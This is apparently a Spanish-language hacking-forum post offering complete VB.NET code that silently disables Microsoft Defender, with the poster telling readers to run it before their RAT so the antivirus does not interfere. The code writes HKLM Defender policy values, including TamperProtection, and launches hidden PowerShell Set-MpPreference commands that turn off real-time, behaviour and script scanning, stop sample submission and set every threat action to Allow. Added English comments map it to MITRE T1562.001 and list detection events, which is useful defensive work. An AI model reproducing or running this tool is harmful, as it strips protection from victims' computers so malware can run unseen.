HOLA!!!
Les paso este codigo recien terminado para deshabilitar Windows defender en tiempo de ejecucion.
Vieron que Windows defender es casi tan histerico como Avira, suele saltar por casi cualquier cosa, solo ejecuten este codigo antes que su RAT y se va a ejecutar sin problemas sin que WD moleste.
[El metodo deshabilita Windows defender y la distribucion de muestras sin mostrar ninguna notificacion ni reiniciar la pc todo instantaneo y bonito]
Imports System
Imports Microsoft.Win32
Imports System.Diagnostics
Imports System.Security.Principal
' ANALYSIS NOTE: this listing is a defense-impairment sample (MITRE ATT&CK T1562.001,
' "Impair Defenses: Disable or Modify Tools"). The comments describe what the visible code
' does and which artifacts it leaves behind for detection and triage.
Namespace DeshabilitarWD
Class Programa
''' <summary>
''' Entry point. Exits silently unless the process token is in the local Administrators
''' role, then writes five Microsoft Defender values under HKLM and calls CheckDefender.
''' </summary>
Private Shared Sub Main()
' Elevation gate: without an administrator token nothing below runs.
If Not New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) Then Return
' The values written here are high-signal registry indicators. Registry auditing
' (for example Sysmon Event ID 13, value set) on these HKLM paths will record them.
' NOTE(review): Microsoft documents Tamper Protection as blocking this class of change
' when it is enabled, so keeping it on is the primary mitigation. Confirm behaviour for
' the Defender platform version in use.
EditarRegistro("SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1")
CheckDefender()
End Sub
''' <summary>
''' Runs "Get-MpPreference -verbose" in a hidden PowerShell process, reads its standard
''' output line by line and, for each listed preference not already at the weakened value,
''' launches a separate PowerShell process running the matching Set-MpPreference command.
''' </summary>
Private Shared Sub CheckDefender()
' Detection surface: powershell.exe is started without a window and with stdout
' redirected. Process-creation logging with command lines (Security 4688 / Sysmon 1)
' captures the Get-MpPreference call and every Set-MpPreference child that follows.
Dim proc As Process = New Process With {
.StartInfo = New ProcessStartInfo With {
.FileName = "powershell",
.Arguments = "Get-MpPreference -verbose",
.UseShellExecute = False,
.RedirectStandardOutput = True,
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True
}
}
proc.Start()
' Matching is by substring on each output line: the preference name plus "False" for the
' boolean settings, or the absence of a target digit for the numeric ones.
While Not proc.StandardOutput.EndOfStream
Dim line As String = proc.StandardOutput.ReadLine()
' Boolean Disable* preferences: each branch sets the preference to $true.
' Successful changes appear as Event ID 5007 (configuration changed) in the
' Microsoft-Windows-Windows Defender/Operational log. Real-time protection being
' switched off is additionally logged as Event ID 5001.
If line.Contains("DisableRealtimeMonitoring") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableRealtimeMonitoring $true")
ElseIf line.Contains("DisableBehaviorMonitoring") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableBehaviorMonitoring $true")
ElseIf line.Contains("DisableBlockAtFirstSeen") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableBlockAtFirstSeen $true")
ElseIf line.Contains("DisableIOAVProtection") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableIOAVProtection $true")
ElseIf line.Contains("DisablePrivacyMode") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisablePrivacyMode $true")
ElseIf line.Contains("SignatureDisableUpdateOnStartupWithoutEngine") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true")
ElseIf line.Contains("DisableArchiveScanning") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableArchiveScanning $true")
ElseIf line.Contains("DisableIntrusionPreventionSystem") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableIntrusionPreventionSystem $true")
ElseIf line.Contains("DisableScriptScanning") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableScriptScanning $true")
' Cloud and sample-submission settings. Per the Set-MpPreference documentation,
' SubmitSamplesConsent 2 means "never send" and MAPSReporting 0 means "disabled".
' A host that stops reporting to cloud protection is itself a fleet-level signal.
ElseIf line.Contains("SubmitSamplesConsent") AndAlso Not line.Contains("2") Then
Pwrshll("Set-MpPreference -SubmitSamplesConsent 2")
ElseIf line.Contains("MAPSReporting") AndAlso Not line.Contains("0") Then
Pwrshll("Set-MpPreference -MAPSReporting 0")
' Default remediation actions per threat severity. The documented meaning of value 6 is
' "Allow". All four severities set to 6 is not a normal administrative baseline and is
' worth alerting on.
ElseIf line.Contains("HighThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -HighThreatDefaultAction 6 -Force")
ElseIf line.Contains("ModerateThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -ModerateThreatDefaultAction 6")
ElseIf line.Contains("LowThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -LowThreatDefaultAction 6")
ElseIf line.Contains("SevereThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -SevereThreatDefaultAction 6")
End If
End While
End Sub
''' <summary>
''' Starts a new PowerShell process with the given argument string, requesting a hidden
''' window, and returns without waiting for it or reading its output.
''' </summary>
''' <param name="args">Command line passed verbatim to powershell.</param>
Private Shared Sub Pwrshll(ByVal args As String)
' Each call is its own powershell.exe. One run can therefore produce a burst of short-lived
' PowerShell children from the same parent, each with a Set-MpPreference command line.
' That parent/child pattern is a practical hunting query, and script block logging
' (Event ID 4104) records the same commands.
Dim proc As Process = New Process With {
.StartInfo = New ProcessStartInfo With {
.FileName = "powershell",
.Arguments = args,
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True
}
}
proc.Start()
End Sub
''' <summary>
''' Opens the HKLM subkey with read/write permission checking. Creates the key and sets the
''' value as a DWord when the key is absent; otherwise sets it when the stored value
''' compares unequal to the supplied one.
''' </summary>
''' <param name="regPath">Subkey path relative to HKEY_LOCAL_MACHINE.</param>
''' <param name="name">Value name to write.</param>
''' <param name="value">Value data, supplied as a string and written with RegistryValueKind.DWord.</param>
Private Shared Sub EditarRegistro(ByVal regPath As String, ByVal name As String, ByVal value As String)
Try
Using key As RegistryKey = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)
' Missing key: it is created, so the appearance of a new
' "Policies\Microsoft\Windows Defender" subtree on an unmanaged host is itself an indicator.
If key Is Nothing Then
Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord)
Return
End If
If key.GetValue(name) <> CObj(value) Then key.SetValue(name, value, RegistryValueKind.DWord)
End Using
' The empty Catch discards every exception, so a denied write raises no error and shows no
' message. Do not rely on application errors to reveal a blocked attempt; use registry and
' Defender event telemetry instead.
Catch
End Try
End Sub
End Class
End Namespace
GRACIAS POR LEER!!!